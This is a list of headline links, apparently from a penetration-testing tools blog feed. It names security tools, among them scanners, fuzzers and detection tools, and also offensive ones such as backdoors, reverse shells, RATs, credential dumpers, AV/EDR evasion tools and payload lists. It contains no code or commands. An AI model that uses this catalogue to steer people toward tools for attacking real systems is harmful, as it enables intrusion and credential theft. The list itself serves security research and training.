- [BadBlood - Fills A Microsoft Active Directory Domain With A Structure And Thousands Of Objects](http://feedproxy.google.com/~r/PentestTools/~3/0RIQKSdcD7g/badblood-fills-microsoft-active.html)
- [Xencrypt - A PowerShell Script Anti-Virus Evasion Tool](http://feedproxy.google.com/~r/PentestTools/~3/tsG6j90hzCs/xencrypt-powershell-script-anti-virus.html)
- [Subfinder - A Subdomain Discovery Tool That Discovers Valid Subdomains For Websites](http://feedproxy.google.com/~r/PentestTools/~3/vCZaCN82KYg/subfinder-subdomain-discovery-tool-that.html)
- [Extended-SSRF-Search - Smart SSRF Scanner Using Different Methods Like Parameter Brute Forcing In Post And Get...](http://feedproxy.google.com/~r/PentestTools/~3/af0QkevNIdM/extended-ssrf-search-smart-ssrf-scanner.html)
- [IoTGoat - A Deliberately Insecure Firmware Based On OpenWrt](http://feedproxy.google.com/~r/PentestTools/~3/Na957g08Nao/iotgoat-deliberately-insecure-firmware.html)
- [Polyshell - A Bash/Batch/PowerShell Polyglot!](http://feedproxy.google.com/~r/PentestTools/~3/lBSRHwUKH54/polyshell-bashbatchpowershell-polyglot.html)
- [Mouse Framework - An iOS And macOS Post Exploitation Surveillance Framework That Gives You A Command Line Session With Extra Functionality Between You And A Target Machine Using Only A Simple Mouse Payload](http://feedproxy.google.com/~r/PentestTools/~3/44DtEktjcjs/mouse-framework-ios-and-macos-post.html)
- [Multi-Juicer - Run Capture The Flags And Security Trainings With OWASP Juice Shop](http://feedproxy.google.com/~r/PentestTools/~3/rp0ruyY5g8Y/multi-juicer-run-capture-flags-and.html)
- [Progress-Burp - Burp Suite Extension To Track Vulnerability Assessment Progress](http://feedproxy.google.com/~r/PentestTools/~3/eKC-H8D-mlc/progress-burp-burp-suite-extension-to.html)
- [Faraday presents the latest version of their Security Platform for Vulnerability Management Automation](http://feedproxy.google.com/~r/PentestTools/~3/o3jspfMgbBg/faraday-presents-latest-version-of.html)
- [ABD - Course Materials For Advanced Binary Deobfuscation](http://feedproxy.google.com/~r/PentestTools/~3/20oxrKN1-QM/abd-course-materials-for-advanced.html)
- [Wifi-Hacker - Shell Script For Attacking Wireless Connections Using Built-In Kali Tools](http://feedproxy.google.com/~r/PentestTools/~3/reqKjsxqjec/wifi-hacker-shell-script-for-attacking.html)
- [get_Team_Pass - Get Teamviewer's ID And Password From A Remote Computer In The LAN](http://feedproxy.google.com/~r/PentestTools/~3/2nV32YcnHLc/getteampass-get-teamviewers-id-and.html)
- [Faraday presents the latest version of their Security Platform for Vulnerability Management Automation](http://feedproxy.google.com/~r/PentestTools/~3/o3jspfMgbBg/faraday-presents-latest-version-of.html)
- [Dnssearch - A Subdomain Enumeration Tool](http://feedproxy.google.com/~r/PentestTools/~3/cSEFFSWU82Y/dnssearch-subdomain-enumeration-tool.html)
- [Liffy - Local File Inclusion Exploitation Tool](http://feedproxy.google.com/~r/PentestTools/~3/doCxm7pPktM/liffy-local-file-inclusion-exploitation.html)
- [DLLPasswordFilterImplant - DLL Password Filter Implant With Exfiltration Capabilities](http://feedproxy.google.com/~r/PentestTools/~3/mifVxsKvfDU/dllpasswordfilterimplant-dll-password.html)
- [Ohmybackup - Scan Victim Backup Directories & Backup Files](http://feedproxy.google.com/~r/PentestTools/~3/ZCghGgPokOs/ohmybackup-scan-victim-backup.html)
- [Gadgetinspector - A Byte Code Analyzer For Finding Deserialization Gadget Chains In Java Applications](http://feedproxy.google.com/~r/PentestTools/~3/616DRhcc9PY/gadgetinspector-byte-code-analyzer-for.html)
- [OWASP D4N155 - Intelligent And Dynamic Wordlist Using OSINT](http://feedproxy.google.com/~r/PentestTools/~3/n1VoccnlfBQ/owasp-d4n155-intelligent-and-dynamic.html)
- [TaskManager-Button-Disabler - Simple Way To Disable/Rename Buttons From A Task Manager](http://feedproxy.google.com/~r/PentestTools/~3/i-DTAybLUlQ/taskmanager-button-disabler-simple-way.html)
- [SUDO_KILLER - A Tool To Identify And Exploit Sudo Rules' Misconfigurations And Vulnerabilities Within Sudo](http://feedproxy.google.com/~r/PentestTools/~3/mJ6rC9VO2Lw/sudokiller-tool-to-identify-and-exploit.html)
- [Adama - Searches For Threat Hunting And Security Analytics](http://feedproxy.google.com/~r/PentestTools/~3/Lw8c0rtzWHk/adama-searches-for-threat-hunting-and.html)
- [Metabigor - Intelligence Tool But Without API Key](http://feedproxy.google.com/~r/PentestTools/~3/H-YTt6OEKcU/metabigor-intelligence-tool-but-without.html)
- [Rabid - A CLI Tool And Library Allowing To Simply Decode All Kind Of BigIP Cookies](http://feedproxy.google.com/~r/PentestTools/~3/1JMZZAEpemQ/rabid-cli-tool-and-library-allowing-to.html)
- [0L4Bs - Cross-site Scripting Labs For Web Application Security Enthusiasts](http://feedproxy.google.com/~r/PentestTools/~3/Y4d76WceP4E/0l4bs-cross-site-scripting-labs-for-web.html)
- [CVE Api - Parse & filter the latest CVEs from cve.mitre.org](http://feedproxy.google.com/~r/PentestTools/~3/Ek-Lal8-LH8/cve-api-parse-filter-latest-cves-from.html)
- [NekoBot - Auto Exploiter With 500+ Exploit 2000+ Shell](http://feedproxy.google.com/~r/PentestTools/~3/u2JnZaho9cA/nekobot-auto-exploiter-with-500-exploit.html)
- [Gospider - Fast Web Spider Written In Go](http://feedproxy.google.com/~r/PentestTools/~3/PdxXgvqeH3g/gospider-fast-web-spider-written-in-go.html)
- [DecryptTeamViewer - Enumerate And Decrypt TeamViewer Credentials From Windows Registry](http://feedproxy.google.com/~r/PentestTools/~3/uYU3KYqg2cg/decryptteamviewer-enumerate-and-decrypt.html)
- [DrSemu - Malware Detection And Classification Tool Based On Dynamic Behavior](http://feedproxy.google.com/~r/PentestTools/~3/FA9NSGPorlI/drsemu-malware-detection-and.html)
- [Syborg - Recursive DNS Subdomain Enumerator With Dead-End Avoidance System](http://feedproxy.google.com/~r/PentestTools/~3/oPQt_c36ATg/syborg-recursive-dns-subdomain.html)
- [Manul - A Coverage-Guided Parallel Fuzzer For Open-Source And Blackbox Binaries On Windows, Linux And MacOS](http://feedproxy.google.com/~r/PentestTools/~3/UD2xNacURp8/manul-coverage-guided-parallel-fuzzer.html)
- [Fuzzowski - The Network Protocol Fuzzer That We Will Want To Use](http://feedproxy.google.com/~r/PentestTools/~3/eu4riYMhOb4/fuzzowski-network-protocol-fuzzer-that.html)
- [Nray - Distributed Port Scanner](http://feedproxy.google.com/~r/PentestTools/~3/uUwUFSIzAtI/nray-distributed-port-scanner.html)
- [BurpSuite Random User-Agents - Burp Suite Extension For Generate A Random User-Agents](http://feedproxy.google.com/~r/PentestTools/~3/XWRZVszjjKQ/burpsuite-random-user-agents-burp-suite.html)
- [CTFTOOL - Interactive CTF Exploration Tool](http://feedproxy.google.com/~r/PentestTools/~3/SMda1qfS7rQ/ctftool-interactive-ctf-exploration-tool.html)
- [Aduket - Straight-forward HTTP Client Testing, Assertions Included](http://feedproxy.google.com/~r/PentestTools/~3/IoOp4Q2Bsdw/aduket-straight-forward-http-client.html)
- [OpenRelayMagic - Tool To Find SMTP Servers Vulnerable To Open Relay](http://feedproxy.google.com/~r/PentestTools/~3/8djCQDrFViE/openrelaymagic-tool-to-find-smtp.html)
- [Hashcracker - Python Hash Cracker](http://feedproxy.google.com/~r/PentestTools/~3/tQ9w6e50haI/hashcracker-python-hash-cracker.html)
- [KawaiiDeauther - Jam All Wifi Clients/Routers](http://feedproxy.google.com/~r/PentestTools/~3/I4p_-V-WdL4/kawaiideauther-jam-all-wifi.html)
- [Agente - Distributed Simple And Robust Release Management And Monitoring System](http://feedproxy.google.com/~r/PentestTools/~3/MMfIyPc4oQY/agente-distributed-simple-and-robust.html)
- [XSS-Freak - An XSS Scanner Fully Written In Python3 From Scratch](http://feedproxy.google.com/~r/PentestTools/~3/zKryaXden3w/xss-freak-xss-scanner-fully-written-in.html)
- [IPv6Tools - A Robust Modular Framework That Enables The Ability To Visually Audit An IPv6 Enabled Network](http://feedproxy.google.com/~r/PentestTools/~3/zIWvMXjZXwY/ipv6tools-robust-modular-framework-that.html)
- [Pytm - A Pythonic Framework For Threat Modeling](http://feedproxy.google.com/~r/PentestTools/~3/I-03rNekozE/pytm-pythonic-framework-for-threat.html)
- [Netdata - Real-time Performance Monitoring](http://feedproxy.google.com/~r/PentestTools/~3/GZiaz-U_eV0/netdata-real-time-performance-monitoring.html)
- [InjuredAndroid - A Vulnerable Android Application That Shows Simple Examples Of Vulnerabilities In A CTF Style](http://feedproxy.google.com/~r/PentestTools/~3/AlIo6dS7vnA/injuredandroid-vulnerable-android.html)
- [FockCache - Minimalized Test Cache Poisoning](http://feedproxy.google.com/~r/PentestTools/~3/yvUsaKZFbKE/fockcache-minimalized-test-cache.html)
- [Acunetix v13 - Web Application Security Scanner](http://feedproxy.google.com/~r/PentestTools/~3/cILVQWYMmjE/acunetix-v13-web-application-security.html)
- [SEcraper - Search Engine Scraper Tool With BASH Script.](http://feedproxy.google.com/~r/PentestTools/~3/XB3R6BuCcL4/secraper-search-engine-scraper-tool.html)
- [Re2Pcap - Create PCAP file from raw HTTP request or response in seconds](http://feedproxy.google.com/~r/PentestTools/~3/yN0HmWU-WRs/re2pcap-create-pcap-file-from-raw-http.html)
- [Takeover v0.2 - Sub-Domain TakeOver Vulnerability Scanner](http://feedproxy.google.com/~r/PentestTools/~3/IDqUAZyTWp8/takeover-v02-sub-domain-takeover.html)
- [Misp-Dashboard - A Dashboard For A Real-Time Overview Of Threat Intelligence From MISP Instances](http://feedproxy.google.com/~r/PentestTools/~3/njo_mxuM5uQ/misp-dashboard-dashboard-for-real-time.html)
- [Jaeles v0.4 - The Swiss Army Knife For Automated Web Application Testing](http://feedproxy.google.com/~r/PentestTools/~3/0ZdNMINytRU/jaeles-v04-swiss-army-knife-for.html)
- [Dufflebag - Search Exposed EBS Volumes For Secrets](http://feedproxy.google.com/~r/PentestTools/~3/lY7u0_HX1rY/dufflebag-search-exposed-ebs-volumes.html)
- [Qiling - Advanced Binary Emulation Framework](http://feedproxy.google.com/~r/PentestTools/~3/so35MNAD8Ds/qiling-advanced-binary-emulation.html)
- [Nfstream - A Flexible Network Data Analysis Framework](http://feedproxy.google.com/~r/PentestTools/~3/7wTSiAirmI4/nfstream-flexible-network-data-analysis.html)
- [WhatTheHack - A Collection Of Challenge Based Hack-A-Thons Including Student Guide, Proctor Guide, Lecture Presentations, Sample/Instructional Code And Templates](http://feedproxy.google.com/~r/PentestTools/~3/UVLZMgsEoyE/whatthehack-collection-of-challenge.html)
- [Injectus - CRLF And Open Redirect Fuzzer](http://feedproxy.google.com/~r/PentestTools/~3/4Y4q9n5vYvI/injectus-crlf-and-open-redirect-fuzzer.html)
- [PCFG Cracker - Probabilistic Context Free Grammar (PCFG) Password Guess Generator](http://feedproxy.google.com/~r/PentestTools/~3/pUPLSnr8DAg/pcfg-cracker-probabilistic-context-free.html)
- [DVNA - Damn Vulnerable NodeJS Application](http://feedproxy.google.com/~r/PentestTools/~3/PK1o0xNPV_c/dvna-damn-vulnerable-nodejs-application.html)
- [GDA Android Reversing Tool - A New Decompiler Written Entirely In C++, So It Does Not Rely On The Java Platform, Which Is Succinct, Portable And Fast, And Supports APK, DEX, ODEX, Oat](http://feedproxy.google.com/~r/PentestTools/~3/d0P7zuioR8E/gda-android-reversing-tool-new.html)
- [Project-Black - Pentest/BugBounty Progress Control With Scanning Modules](http://feedproxy.google.com/~r/PentestTools/~3/Ax6sehyyy7Q/project-black-pentestbugbounty-progress.html)
- [RiskAssessmentFramework - Static Application Security Testing](http://feedproxy.google.com/~r/PentestTools/~3/tKjitJqHxMY/riskassessmentframework-static.html)
- [MassDNS - A High-Performance DNS Stub Resolver For Bulk Lookups And Reconnaissance (Subdomain Enumeration)](http://feedproxy.google.com/~r/PentestTools/~3/wardjAcW3y8/massdns-high-performance-dns-stub.html)
- [S3Enum - Fast Amazon S3 Bucket Enumeration Tool For Pentesters](http://feedproxy.google.com/~r/PentestTools/~3/cRCWjBIgR3Q/s3enum-fast-amazon-s3-bucket.html)
- [See-SURF - Python Based Scanner To Find Potential SSRF Parameters](http://feedproxy.google.com/~r/PentestTools/~3/BTvpSqsYkxI/see-surf-python-based-scanner-to-find.html)
- [Blinder - A Python Library To Automate Time-Based Blind SQL Injection](http://feedproxy.google.com/~r/PentestTools/~3/YQkDIo_3R6s/blinder-python-library-to-automate-time.html)
- [Obfuscapk - A Black-Box Obfuscation Tool For Android Apps](http://feedproxy.google.com/~r/PentestTools/~3/FL9KaM-xfFs/obfuscapk-black-box-obfuscation-tool.html)
- [Kali Linux 2020.1 Release - Penetration Testing and Ethical Hacking Linux Distribution](http://feedproxy.google.com/~r/PentestTools/~3/RSHYk9L_sow/kali-linux-20201-release-penetration.html)
- [PythonAESObfuscate - Obfuscates A Python Script And The Accompanying Shellcode](http://feedproxy.google.com/~r/PentestTools/~3/QEb6i3xJnFE/pythonaesobfuscate-obfuscates-python.html)
- [ApplicationInspector - A Source Code Analyzer Built For Surfacing Features Of Interest And Other Characteristics To Answer The Question 'What'S In It' Using Static Analysis With A Json Based Rules Engine](http://feedproxy.google.com/~r/PentestTools/~3/mCSCxjbcOGE/applicationinspector-source-code.html)
- [CredNinja - A Multithreaded Tool Designed To Identify If Credentials Are Valid, Invalid, Or Local Admin Valid Credentials Within A Network At-Scale Via SMB, Plus Now With A User Hunter](http://feedproxy.google.com/~r/PentestTools/~3/uvDDyxM0J6o/credninja-multithreaded-tool-designed.html)
- [Mimir - Smart OSINT Collection Of Common IOC Types](http://feedproxy.google.com/~r/PentestTools/~3/_x0y2TtxD5w/mimir-smart-osint-collection-of-common.html)
- [Socialscan - Check Email Address And Username Availability On Online Platforms With 100% Accuracy](http://feedproxy.google.com/~r/PentestTools/~3/yHydtjSLSqU/socialscan-check-email-address-and.html)
- [Aircrack-ng 1.6 - Complete Suite Of Tools To Assess WiFi Network Security](http://feedproxy.google.com/~r/PentestTools/~3/A9m6uTb9wwY/aircrack-ng-16-complete-suite-of-tools.html)
- [Memhunter - Live Hunting Of Code Injection Techniques](http://feedproxy.google.com/~r/PentestTools/~3/t80qn5tgm1w/memhunter-live-hunting-of-code.html)
- [AgentSmith-HIDS - Open Source Host-based Intrusion Detection System (HIDS)](http://feedproxy.google.com/~r/PentestTools/~3/ktpMleroAeg/agentsmith-hids-open-source-host-based.html)
- [Hershell - Multiplatform Reverse Shell Generator](http://feedproxy.google.com/~r/PentestTools/~3/rBBYS2KJVlk/hershell-multiplatform-reverse-shell.html)
- [Check-LocalAdminHash - A PowerShell Tool That Attempts To Authenticate To Multiple Hosts Over Either WMI Or SMB Using A Password Hash To Determine If The Provided Credential Is A Local Administrator](http://feedproxy.google.com/~r/PentestTools/~3/-OGGgCcLOic/check-localadminhash-powershell-tool.html)
- [SharpStat - C# Utility That Uses WMI To Run "cmd.exe /c netstat -n", Save The Output To A File, Then Use SMB To Read And Delete The File Remotely](http://feedproxy.google.com/~r/PentestTools/~3/L_7F6PqfmYQ/sharpstat-c-utility-that-uses-wmi-to.html)
- [KsDumper - Dumping Processes Using The Power Of Kernel Space](http://feedproxy.google.com/~r/PentestTools/~3/WAXe05PXlLE/ksdumper-dumping-processes-using-power.html)
- [YARASAFE - Automatic Binary Function Similarity Checks with Yara](http://feedproxy.google.com/~r/PentestTools/~3/Oj-R3rE4Nqs/yarasafe-automatic-binary-function.html)
- [AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model](http://feedproxy.google.com/~r/PentestTools/~3/Wz_C66kvWFE/alertresponder-automatic-security-alert.html)
- [TAS - A Tiny Framework For Easily Manipulate The Tty And Create Fake Binaries](http://feedproxy.google.com/~r/PentestTools/~3/HXA3Vvtm-Bk/tas-tiny-framework-for-easily.html)
- [Corsy v1.0 - CORS Misconfiguration Scanner](http://feedproxy.google.com/~r/PentestTools/~3/58-ls_cmwQw/corsy-v10-cors-misconfiguration-scanner.html)
- [TeleGram-Scraper - Telegram Group Scraper Tool (Fetch All Information About Group Members)](http://feedproxy.google.com/~r/PentestTools/~3/2Eo2G25RcDQ/telegram-scraper-telegram-group-scraper.html)
- [Grouper2 - Find Vulnerabilities In AD Group Policy](http://feedproxy.google.com/~r/PentestTools/~3/gWXrrK2NyKY/grouper2-find-vulnerabilities-in-ad.html)
- [Gophish - Open-Source Phishing Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/btpn4JOATyY/gophish-open-source-phishing-toolkit.html)
- [Aaia - AWS Identity And Access Management Visualizer And Anomaly Finder](http://feedproxy.google.com/~r/PentestTools/~3/2yvKL6xqlqM/aaia-aws-identity-and-access-management.html)
- [Scallion - GPU-based Onion Addresses Hash Generator](http://feedproxy.google.com/~r/PentestTools/~3/FqpfCNmnoQU/scallion-gpu-based-onion-addresses-hash.html)
- [Bluewall - A Firewall Framework Designed For Offensive And Defensive Cyber Professionals](http://feedproxy.google.com/~r/PentestTools/~3/A7Padhi7JMQ/bluewall-firewall-framework-designed.html)
- [AntiCheat-Testing-Framework - Framework To Test Any Anti-Cheat](http://feedproxy.google.com/~r/PentestTools/~3/MoEg1J7w6pk/anticheat-testing-framework-framework.html)
- [Gowitness - A Golang, Web Screenshot Utility Using Chrome Headless](http://feedproxy.google.com/~r/PentestTools/~3/Y17_OJQnjrw/gowitness-golang-web-screenshot-utility.html)
- [Lsassy - Extract Credentials From Lsass Remotely](http://feedproxy.google.com/~r/PentestTools/~3/Mfhkp5fW17U/lsassy-extract-credentials-from-lsass.html)
- [LOLBITS - C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol](http://feedproxy.google.com/~r/PentestTools/~3/8qthCOAJoKw/lolbits-c-reverse-shell-using.html)
- [Shell Backdoor List - PHP / ASP Shell Backdoor List](http://feedproxy.google.com/~r/PentestTools/~3/4bTU5BSifCg/shell-backdoor-list-php-asp-shell.html)
- [Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application](http://feedproxy.google.com/~r/PentestTools/~3/8uHkviu3bCQ/hakrawler-simple-fast-web-crawler.html)
- [Gtfo - Search For Unix Binaries That Can Be Exploited To Bypass System Security Restrictions](http://feedproxy.google.com/~r/PentestTools/~3/vY14tKcJFoo/gtfo-search-for-unix-binaries-that-can.html)
- [SWFPFinder - SWF Potential Parameters Finder](http://feedproxy.google.com/~r/PentestTools/~3/oq6S3f4ZiN8/swfpfinder-swf-potential-parameters.html)
- [laravelN00b - Automated Scan .env Files And Checking Debug Mode In Victim Host](http://feedproxy.google.com/~r/PentestTools/~3/2gcvf8zseEA/laraveln00b-automated-scan-env-files.html)
- [Andriller - Software Utility With A Collection Of Forensic Tools For Smartphones](http://feedproxy.google.com/~r/PentestTools/~3/CGAtcMHkN58/andriller-software-utility-with.html)
- [LAVA - Large-scale Automated Vulnerability Addition](http://feedproxy.google.com/~r/PentestTools/~3/NcAB_2aw32k/lava-large-scale-automated.html)
- [Heapinspect - Inspect Heap In Python](http://feedproxy.google.com/~r/PentestTools/~3/IiCD14cYq24/heapinspect-inspect-heap-in-python.html)
- [CHAPS - Configuration Hardening Assessment PowerShell Script](http://feedproxy.google.com/~r/PentestTools/~3/5KGQldrk1HE/chaps-configuration-hardening.html)
- [Karonte - A Static Analysis Tool To Detect Multi-Binary Vulnerabilities In Embedded Firmware](http://feedproxy.google.com/~r/PentestTools/~3/Id6YHzVv09A/karonte-static-analysis-tool-to-detect.html)
- [IotShark - Monitoring And Analyzing IoT Traffic](http://feedproxy.google.com/~r/PentestTools/~3/PeNmS58306Q/iotshark-monitoring-and-analyzing-iot.html)
- [LNAV - Log File Navigator](http://feedproxy.google.com/~r/PentestTools/~3/3vkEu05vBmw/lnav-log-file-navigator.html)
- [TuxResponse - Linux Incident Response](http://feedproxy.google.com/~r/PentestTools/~3/XkMJJaEjx_Q/tuxresponse-linux-incident-response.html)
- [Stowaway - Multi-hop Proxy Tool For Pentesters](http://feedproxy.google.com/~r/PentestTools/~3/YKyUkJguG1o/stowaway-multi-hop-proxy-tool-for.html)
- [Git-Vuln-Finder - Finding Potential Software Vulnerabilities From Git Commit Messages](http://feedproxy.google.com/~r/PentestTools/~3/6trl3SIo3BM/git-vuln-finder-finding-potential.html)
- [WAFW00F v2.0 - Allows One To Identify And Fingerprint Web Application Firewall (WAF) Products Protecting A Website](http://feedproxy.google.com/~r/PentestTools/~3/x0wBL8NRXaE/wafw00f-v20-allows-one-to-identify-and.html)
- [XposedOrNot - Tool To Search An Aggregated Repository Of Xposed Passwords Comprising Of ~850 Million Real Time Passwords](http://feedproxy.google.com/~r/PentestTools/~3/djD79KVqJpY/xposedornot-tool-to-search-aggregated.html)
- [Dsync - IDAPython Plugin That Synchronizes Disassembler And Decompiler Views](http://feedproxy.google.com/~r/PentestTools/~3/cTZCZAOl5ZY/dsync-idapython-plugin-that.html)
- [RFCpwn - An Enumeration And Exploitation Toolkit Using RFC Calls To SAP](http://feedproxy.google.com/~r/PentestTools/~3/SxCeVp5LrPY/rfcpwn-enumeration-and-exploitation.html)
- [LKWA - Lesser Known Web Attack Lab](http://feedproxy.google.com/~r/PentestTools/~3/_D8J5ofnkjc/lkwa-lesser-known-web-attack-lab.html)
- [Multiscanner - Modular File Scanning/Analysis Framework](http://feedproxy.google.com/~r/PentestTools/~3/JCWYObLaesQ/multiscanner-modular-file.html)
- [Findomain v0.9.3 - The Fastest And Cross-Platform Subdomain Enumerator](http://feedproxy.google.com/~r/PentestTools/~3/F8FCuzzp1eY/findomain-v093-fastest-and-cross.html)
- [OKadminFinder - Admin Panel Finder / Admin Login Page Finder](http://feedproxy.google.com/~r/PentestTools/~3/Wy3OcRdb1pk/okadminfinder-admin-panel-finder-admin.html)
- [BetterBackdoor - A Backdoor With A Multitude Of Features](http://feedproxy.google.com/~r/PentestTools/~3/fnQYMC92Af4/betterbackdoor-backdoor-with-multitude.html)
- [Spraykatz - A Tool Able To Retrieve Credentials On Windows Machines And Large Active Directory Environments](http://feedproxy.google.com/~r/PentestTools/~3/hk7FN1evtJ4/spraykatz-tool-able-to-retrieve.html)
- [Shelly - Simple Backdoor Manager With Python (Based On Weevely)](http://feedproxy.google.com/~r/PentestTools/~3/Oof3oJ5ys_U/shelly-simple-backdoor-manager-with.html)
- [huskyCI - Performing Security Tests Inside Your CI](http://feedproxy.google.com/~r/PentestTools/~3/PCjfmxm5mk0/huskyci-performing-security-tests.html)
- [AttackSurfaceMapper - A Tool That Aims To Automate The Reconnaissance Process](http://feedproxy.google.com/~r/PentestTools/~3/BaoKl5m0_Zg/attacksurfacemapper-tool-that-aims-to.html)
- [Pylane - An Python VM Injector With Debug Tools, Based On GDB](http://feedproxy.google.com/~r/PentestTools/~3/NXSFocHtf4w/pylane-python-vm-injector-with-debug.html)
- [PAKURI - Penetration Test Achieve Knowledge Unite Rapid Interface](http://feedproxy.google.com/~r/PentestTools/~3/Mi6WN2Gybmo/pakuri-penetration-test-achieve.html)
- [Malwinx - Just A Normal Flask Web App To Understand Win32Api With Code Snippets And References](http://feedproxy.google.com/~r/PentestTools/~3/uJtIDU0fedk/malwinx-just-normal-flask-web-app-to.html)
- [Quark-Engine - An Obfuscation-Neglect Android Malware Scoring System](http://feedproxy.google.com/~r/PentestTools/~3/utzP6iBfGHg/quark-engine-obfuscation-neglect.html)
- [nmapAutomator - Tool To Automate All Of The Process Of Recon/Enumeration](http://feedproxy.google.com/~r/PentestTools/~3/E4Iu0NnZ68s/nmapautomator-tool-to-automate-all-of.html)
- [RansomCoin - A DFIR Tool To Extract Cryptocoin Addresses And Other Indicators Of Compromise From Binaries](http://feedproxy.google.com/~r/PentestTools/~3/GvziPKgW9H8/ransomcoin-dfir-tool-to-extract.html)
- [Pown.js - A Security Testing An Exploitation Toolkit Built On Top Of Node.js And NPM](http://feedproxy.google.com/~r/PentestTools/~3/d6N6weN0Sls/pownjs-security-testing-exploitation.html)
- [Top 20 Most Popular Hacking Tools in 2019](http://feedproxy.google.com/~r/PentestTools/~3/nlQ2cTwvBWU/top-20-most-popular-hacking-tools-in.html)
- [Turbolist3r - Subdomain Enumeration Tool With Analysis Features For Discovered Domains](http://feedproxy.google.com/~r/PentestTools/~3/N2YrQhf-ZQA/turbolist3r-subdomain-enumeration-tool.html)
- [SQLMap v1.4 - Automatic SQL Injection And Database Takeover Tool](http://feedproxy.google.com/~r/PentestTools/~3/E9qL_gItzM0/sqlmap-v14-automatic-sql-injection-and.html)
- [AVCLASS++ - Yet Another Massive Malware Labeling Tool](http://feedproxy.google.com/~r/PentestTools/~3/grHx9mKrtYw/avclass-yet-another-massive-malware.html)
- [XSpear v1.3 - Powerfull XSS Scanning And Parameter Analysis Tool](http://feedproxy.google.com/~r/PentestTools/~3/bznAwae962s/xspear-v13-powerfull-xss-scanning-and.html)
- [Kamerka GUI - Ultimate Internet Of Things/Industrial Control Systems Reconnaissance Tool](http://feedproxy.google.com/~r/PentestTools/~3/VXVdUp5N_VE/kamerka-gui-ultimate-internet-of.html)
- [SysWhispers - AV/EDR Evasion Via Direct System Calls](http://feedproxy.google.com/~r/PentestTools/~3/WdlNh76UZmY/syswhispers-avedr-evasion-via-direct.html)
- [S3Tk - A Security Toolkit For Amazon S3](http://feedproxy.google.com/~r/PentestTools/~3/I-t2K2h-_nM/s3tk-security-toolkit-for-amazon-s3.html)
- [WindowsFirewallRuleset - Windows Firewall Ruleset Powershell Scripts](http://feedproxy.google.com/~r/PentestTools/~3/k141Im4eB3o/windowsfirewallruleset-windows-firewall.html)
- [AWS Report - Tool For Analyzing Amazon Resources](http://feedproxy.google.com/~r/PentestTools/~3/SAdoyWAz1c4/aws-report-tool-for-analyzing-amazon.html)
- [Tishna - Complete Automated Pentest Framework For Servers, Application Layer To Web Security](http://feedproxy.google.com/~r/PentestTools/~3/3wBSl0rNph4/tishna-complete-automated-pentest.html)
- [RedPeanut - A Small RAT Developed In .Net Core 2 And Its Agent In .Net 3.5/4.0](http://feedproxy.google.com/~r/PentestTools/~3/UUoNVH2ftOs/redpeanut-small-rat-developed-in-net.html)
- [DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices](http://feedproxy.google.com/~r/PentestTools/~3/wfG0ntJ0tYI/detectionlab-vagrant-and-packer-scripts.html)
- [Andor - Blind SQL Injection Tool With Golang](http://feedproxy.google.com/~r/PentestTools/~3/zATm4I4cspQ/andor-blind-sql-injection-tool-with.html)
- [SQL Injection Payload List](http://feedproxy.google.com/~r/PentestTools/~3/ayR6sAbbWFM/sql-injection-payload-list.html)
- [WinPwn - Automation For Internal Windows Penetrationtest / AD-Security](http://feedproxy.google.com/~r/PentestTools/~3/-4Y4QPv6370/winpwn-automation-for-internal-windows.html)
- [Ddoor - Cross Platform Backdoor Using Dns Txt Records](http://feedproxy.google.com/~r/PentestTools/~3/lT6QmCTiWZI/ddoor-cross-platform-backdoor-using-dns.html)
- [Custom Header - Automatic Add New Header To Entire BurpSuite HTTP Requests](http://feedproxy.google.com/~r/PentestTools/~3/FrRisehI7Hw/custom-header-automatic-add-new-header.html)
- [SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA To Run Command](http://feedproxy.google.com/~r/PentestTools/~3/X10EwvOx9PQ/scshell-fileless-lateral-movement-tool.html)
- [Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos](http://feedproxy.google.com/~r/PentestTools/~3/gp_DtiGu_sY/ultimate-facebook-scraper-bot-which.html)
- [FireProx - AWS API Gateway Management Tool For Creating On The Fly HTTP Pass-Through Proxies For Unique IP Rotation](http://feedproxy.google.com/~r/PentestTools/~3/TkQaYYrkjO8/fireprox-aws-api-gateway-management.html)
- [DNCI - Dot Net Code Injector](http://feedproxy.google.com/~r/PentestTools/~3/Ji5q7TQco-c/dnci-dot-net-code-injector.html)
- [RdpThief - Extracting Clear Text Passwords From Mstsc.Exe Using API Hooking](http://feedproxy.google.com/~r/PentestTools/~3/_16Af6YgVU4/rdpthief-extracting-clear-text.html)
- [Leprechaun - Tool Used To Map Out The Network Data Flow To Help Penetration Testers Identify Potentially Valuable Targets](http://feedproxy.google.com/~r/PentestTools/~3/6JmHURb1L1E/leprechaun-tool-used-to-map-out-network.html)
- [Glances - An Eye On Your System. A Top/Htop Alternative For GNU/Linux, BSD, Mac OS And Windows Operating Systems](http://feedproxy.google.com/~r/PentestTools/~3/Bi11t3vQPXc/glances-eye-on-your-system-tophtop.html)
- [Sshtunnel - SSH Tunnels To Remote Server](http://feedproxy.google.com/~r/PentestTools/~3/6M8Oysn80ZY/sshtunnel-ssh-tunnels-to-remote-server.html)
- [RE:TERNAL - Repo Containing Docker-Compose Files And Setup Scripts Without Having To Clone The Individual Reternal Components](http://feedproxy.google.com/~r/PentestTools/~3/IYzPV_tA-XI/reternal-repo-containing-docker-compose.html)
- [Antispy - A Free But Powerful Anti Virus And Rootkits Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/XkcKtXVulps/antispy-free-but-powerful-anti-virus.html)
- [Flan - A Pretty Sweet Vulnerability Scanner By CloudFlare](http://feedproxy.google.com/~r/PentestTools/~3/6-Bh9w3dbPk/flan-pretty-sweet-vulnerability-scanner.html)
- [Corsy - CORS Misconfiguration Scanner](http://feedproxy.google.com/~r/PentestTools/~3/0C7E2QC4myo/corsy-cors-misconfiguration-scanner.html)
- [Kali Linux 2019.4 Release - Penetration Testing and Ethical Hacking Linux Distribution](http://feedproxy.google.com/~r/PentestTools/~3/l8pYhW33fno/kali-linux-20194-release-penetration.html)
- [XML External Entity (XXE) Injection Payload List](http://feedproxy.google.com/~r/PentestTools/~3/eAuCIbT3oBk/xml-external-entity-xxe-injection.html)
